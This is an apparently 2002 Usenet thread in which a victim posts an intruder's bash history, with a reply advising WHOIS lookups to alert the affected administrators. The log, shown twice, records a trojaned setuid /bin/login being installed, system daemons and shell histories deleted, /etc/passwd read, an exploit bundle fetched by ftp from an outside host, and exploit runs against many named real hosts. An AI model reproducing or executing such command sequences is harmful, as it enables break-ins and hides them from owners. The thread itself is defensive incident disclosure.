 PLEASE READ THIS
I got hacked, and this is the .bash_history the hacker left behind.
Several sites are listed in it; if you happen to recognize any of
the IPs/domains, please forward this to their admins so that
something can be done.
----------------
TERM=vt100
pico
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
rm /bin/login
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c
rm /usr/sbin/rpc.mountd
ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
rm /home/kargay
rm /home/kargay/.bash_history
cd /home/kargay
ls
rm -rf *
ls
cat /etc/passwd
cat /etc/hosts
cd .s/dsc
ls
cd .s
ls
./k 202.30.12.244
./k 202.30.48.72
./k 202.30.48.244
./k 202.30.93.154
./k 202.30.93.150
./k 203.230.221.37
cd .s
./d bncchile.cl
TERM=vt100
telnet bncchile.cll
telnet bncchile.cl
exit
mkdir .s
cd .s
ftp mail.bankduta.co.id
unzip linux.zip
chmod +x amdex
mv amdex k
chmod +x mountd
mv mountd d
./d athena.directnet.com.au
./d 202.61.237.123
./d 202.61.252.249
./d alcala.Math.Uni-Augsburg.DE
./d kant.Physik.Uni-Augsburg.DE
./d sozgeo3.Geo.Uni-Augsburg.DE
./d ranabib.rana.fylkesbibl.no
./d 128.39.153.88
./d nisse.gtf.ol.no
./k 212.47.198.113
./d ns1.software602.cz
./d koleje.inplus.cz
./d 212.47.13.197
./d 212.47.13.194
./d 212.47.13.202
./d 212.47.13.209
./d mail.sasbrno.cz
./k 63.198.12.20
cd .s
./k 131.125.74.2
./k 139.62.37.23
./d math-31623.coas.unf.edu
./d 202.61.252.249
./d blue7.mps.ohio-state.edu
./d sycamore.mps.ohio-state.edu
./d amy.mps.ohio-state.edu
./k 171.64.18.167
./d anya.Stanford.EDU
./d netops-9.Stanford.EDU
./d sul-hw-drobinson.Stanford.EDU
./k 209.8.2.235
./d 209.8.0.66
telnet localhost 274444
telnet localhost 27444
./k 134.7.1.50
./k 134.7.1.50
./k 134.7.1.85
./k 134.7.1.168
./k 134.7.2.200
./k 134.7.5.255
./k 134.7.5.254
./d 194.163.27.195
./k 195.224.16.14
cd .s
./k 165.230.67.132
./d rutadmin-smtp.rutgers.edu
./d rcrs-aquatics-scuba.rutgers.edu
./d aquatics.rutgers.edu
ls
ls
ls
cd .s
./d igpp2153.ucr.edu
./k 138.23.168.24
./k 138.23.168.40
./k 194.163.34.119
./k 194.163.86.132
./d woodpecker.poptel.org.uk
./d shirehorse.equiworld.com
./d ns0.jupiter.net.uk
./d news.jupiter.net.uk
./d metis.jupiter.net.uk
./d www.whitgift.croydon.sch.uk
./d oaktree.jupiter.net.uk
./d www.delta-anglia.co.uk
./d sflovers.rutgers.edu
./d scilsnet2-211.rutgers.edu
./d 202.155.4.252
./d 202.155.9.250
exit
cd .s
./k 128.211.161.83
./k 128.211.161.119
./k 128.211.226.122
./k 128.211.236.49
./k 131.170.195.19
dig @linux.quicksilver.org version.bind chaos txt
./d ocelot.lib.rmit.EDU.AU
./d euler.ls.rmit.edu.au
./d liberator.art.rmit.edu.au
./d pc37.et.rmit.edu.au
./d blackadder.cse.rmit.edu.au


 Fri, 02 Aug 2002 03:00:00 GMT   
 PLEASE READ THIS
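Go to www.arin.net and run a WHOIS lookup on the IPs he scanned, then email
the contacts listed there. For addresses outside ARIN's region, the result
will point you to the registry that holds the record (RIPE or APNIC, for
example). For domains, just type in 'whois domain' and get the contact info.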

--buddy

Kar Gay Lim <kag...@hotmail.com> wrote:
: I got hacked, and this is the .bash_history the hacker left behind.
: Several sites are listed in it; if you happen to recognize any of
: the IPs/domains, please forward this to their admins so that
: something can be done.
: ----------------
: TERM=vt100
: pico
: gcc -o login bj.c
: chown root:bin login
: chmod 4555 login
: chmod u-w login
: cp /bin/login /usr/bin/xstat
: cp /bin/login /usr/bin/old
: rm /bin/login
: chmod 555 /usr/bin/xstat
: chgrp bin /usr/bin/xstat
: mv login /bin/login
: rm bj.c
: rm /usr/sbin/rpc.mountd
: ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
: rm /home/kargay
: rm /home/kargay/.bash_history
: cd /home/kargay
: ls
: rm -rf *
: ls
: cat /etc/passwd
: cat /etc/hosts
: cd .s/dsc
: ls
: cd .s
: ls
: ./k 202.30.12.244
: ./k 202.30.48.72
: ./k 202.30.48.244
: ./k 202.30.93.154
: ./k 202.30.93.150
: ./k 203.230.221.37
: cd .s
: ./d bncchile.cl
: TERM=vt100
: telnet bncchile.cll
: telnet bncchile.cl
: exit
: mkdir .s
: cd .s
: ftp mail.bankduta.co.id
: unzip linux.zip
: chmod +x amdex
: mv amdex k
: chmod +x mountd
: mv mountd d
: ./d athena.directnet.com.au
: ./d 202.61.237.123
: ./d 202.61.252.249
: ./d alcala.Math.Uni-Augsburg.DE
: ./d kant.Physik.Uni-Augsburg.DE
: ./d sozgeo3.Geo.Uni-Augsburg.DE
: ./d ranabib.rana.fylkesbibl.no
: ./d 128.39.153.88
: ./d nisse.gtf.ol.no
: ./k 212.47.198.113
: ./d ns1.software602.cz
: ./d koleje.inplus.cz
: ./d 212.47.13.197
: ./d 212.47.13.194
: ./d 212.47.13.202
: ./d 212.47.13.209
: ./d mail.sasbrno.cz
: ./k 63.198.12.20
: cd .s
: ./k 131.125.74.2
: ./k 139.62.37.23
: ./d math-31623.coas.unf.edu
: ./d 202.61.252.249
: ./d blue7.mps.ohio-state.edu
: ./d sycamore.mps.ohio-state.edu
: ./d amy.mps.ohio-state.edu
: ./k 171.64.18.167
: ./d anya.Stanford.EDU
: ./d netops-9.Stanford.EDU
: ./d sul-hw-drobinson.Stanford.EDU
: ./k 209.8.2.235
: ./d 209.8.0.66
: telnet localhost 274444
: telnet localhost 27444
: ./k 134.7.1.50
: ./k 134.7.1.50
: ./k 134.7.1.85
: ./k 134.7.1.168
: ./k 134.7.2.200
: ./k 134.7.5.255
: ./k 134.7.5.254
: ./d 194.163.27.195
: ./k 195.224.16.14
: cd .s
: ./k 165.230.67.132
: ./d rutadmin-smtp.rutgers.edu
: ./d rcrs-aquatics-scuba.rutgers.edu
: ./d aquatics.rutgers.edu
: ls
: ls
: ls
: cd .s
: ./d igpp2153.ucr.edu
: ./k 138.23.168.24
: ./k 138.23.168.40
: ./k 194.163.34.119
: ./k 194.163.86.132
: ./d woodpecker.poptel.org.uk
: ./d shirehorse.equiworld.com
: ./d ns0.jupiter.net.uk
: ./d news.jupiter.net.uk
: ./d metis.jupiter.net.uk
: ./d www.whitgift.croydon.sch.uk
: ./d oaktree.jupiter.net.uk
: ./d www.delta-anglia.co.uk
: ./d sflovers.rutgers.edu
: ./d scilsnet2-211.rutgers.edu
: ./d 202.155.4.252
: ./d 202.155.9.250
: exit
: cd .s
: ./k 128.211.161.83
: ./k 128.211.161.119
: ./k 128.211.226.122
: ./k 128.211.236.49
: ./k 131.170.195.19
: dig @linux.quicksilver.org version.bind chaos txt
: ./d ocelot.lib.rmit.EDU.AU
: ./d euler.ls.rmit.edu.au
: ./d liberator.art.rmit.edu.au
: ./d pc37.et.rmit.edu.au
: ./d blackadder.cse.rmit.edu.au



 Fri, 02 Aug 2002 03:00:00 GMT   
 